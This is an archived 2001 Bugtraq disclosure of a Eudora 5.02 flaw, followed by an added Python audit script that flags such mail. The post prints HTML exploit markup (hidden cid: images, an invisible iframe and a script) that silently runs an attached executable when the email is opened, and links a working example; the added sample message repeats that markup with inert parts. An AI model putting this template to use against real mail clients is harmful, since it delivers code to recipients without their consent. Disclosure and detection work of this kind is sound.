Bugtraq mailing list archives
feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Sun, 18 Mar 2001 01:38:46 -0800
Sunday, March 18, 2001

Silent delivery and installation of an executable on a target computer. No client input other than opening an email using Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer' and 'allow executables in HTML content' are enabled. One wonders why they are there in the first place.

This can be achieved with relative ease as follows:

1. Create yet another HTML mail message as follows:

    <img SRC="cid:mr.malware.to.you" style="display:none">
    <img id=W0W src="cid:malware.com" style="display:none">
    <center><h6>YOU!DORA</h6></center>
    <IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME>
    <script>
    // 18.03.01 http://www.malware.com
    malware.location.href=W0W.src
    </script>

Where our first image is our executable. Our second image comprises a simple JavaScripting and ActiveX control.

What happens is, once the mail message is opened in Eudora 5.02 - Sponsored Mode, the two 'embedded' images are silently and instantly transferred to the 'Embedded' folder.

Our very simple JavaScript location.href then automatically calls our second image comprising the simple JavaScripting and ActiveX control [note: knowing the file names and locations is not necessary at all], which is then displayed out of sight in our iframe. This in turn executes our *.exe.

Very simple. Because our *.exe and our simple JavaScripting and ActiveX control reside in the same folder [the so-called 'Embedded' folder], and because it is automatically called to our iframe, everything is instant. No warning, no nothing. The *.exe is executed instantly. No client input other than opening the email.

2. Working Example. Harmless *.exe incorporated. Tested on win98, with IE5.5 (all of its patches and so-called service packs), Eudora 5.02 - Sponsored Mode with 'use Microsoft viewer' and 'allow executables in HTML content' (this refers to scripting, not literally executables).

The following is in plaintext. We are unable to figure out how to import a single message into Eudora's inbox. Perhaps some bright spark knows. Otherwise, incorporate the text sample into a telnet session or other and fire off to your Eudora inbox:

http://www.malware.com/you!DORA.txt

Notes: disable 'use Microsoft viewer' and 'allow executables in HTML content'

---
http://www.malware.com
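The check below is an added example, not part of the original post or thread: a gateway-side audit, in Python, that flags the message structure described above (hidden active content in the HTML body plus cid: parts whose bytes are not images). The function names, finding labels, the image/gif declarations and the constructed sample (an inert 'MZ' stub and a placeholder script) are assumptions for illustration.

```python
import base64
import re
from email import message_from_bytes, policy

CID_REF = re.compile(r"cid:([^\"'\s>]+)", re.I)
ACTIVE = re.compile(r"<\s*(script|iframe|object|embed)\b", re.I)

def audit_message(raw: bytes) -> list:
    """Flag HTML mail that combines active content with non-image cid: parts."""
    msg = message_from_bytes(raw, policy=policy.default)
    html, parts = [], {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""
        if part.get_content_type() == "text/html":
            html.append(data.decode("latin-1"))  # tags are ASCII; latin-1 never fails
        cid = part.get("Content-ID")
        if cid:  # index every embedded part by its Content-ID
            parts[str(cid).strip().strip("<>").lower()] = data
    findings = []
    for body in html:
        tags = sorted({t.lower() for t in ACTIVE.findall(body)})
        if tags:
            findings.append("active-content:" + ",".join(tags))
        for ref in sorted({r.lower() for r in CID_REF.findall(body)}):
            data = parts.get(ref, b"")
            if data[:2] == b"MZ":  # DOS/PE magic, whatever type the part declares
                findings.append("cid-executable:" + ref)
            elif ACTIVE.search(data.decode("latin-1")):
                findings.append("cid-active-html:" + ref)
    return findings

def constructed_sample() -> bytes:
    """Constructed message: HTML body from the post plus two inert stand-in parts."""
    stub = base64.b64encode(b"MZ" + b"\x00" * 16).decode()  # magic bytes only
    return (
        'MIME-Version: 1.0\r\n'
        'Content-Type: multipart/related; boundary="=_constructed"\r\n\r\n'
        '--=_constructed\r\nContent-Type: text/html\r\n\r\n'
        '<img SRC="cid:mr.malware.to.you" style="display:none">\r\n'
        '<img id=W0W src="cid:malware.com" style="display:none">\r\n'
        '<IFRAME id=malware style="display:none"></IFRAME>\r\n'
        '<script>malware.location.href=W0W.src</script>\r\n'
        '--=_constructed\r\nContent-Type: image/gif\r\n'
        'Content-ID: <mr.malware.to.you>\r\n'
        'Content-Transfer-Encoding: base64\r\n\r\n' + stub + '\r\n'
        '--=_constructed\r\nContent-Type: image/gif\r\n'
        'Content-ID: <malware.com>\r\n\r\n'
        '<script>/* placeholder */</script>\r\n--=_constructed--\r\n'
    ).encode()
```

A message with ordinary inline images produces no findings, since neither the body nor the referenced parts contain script, iframe, object or embed tags or an MZ header.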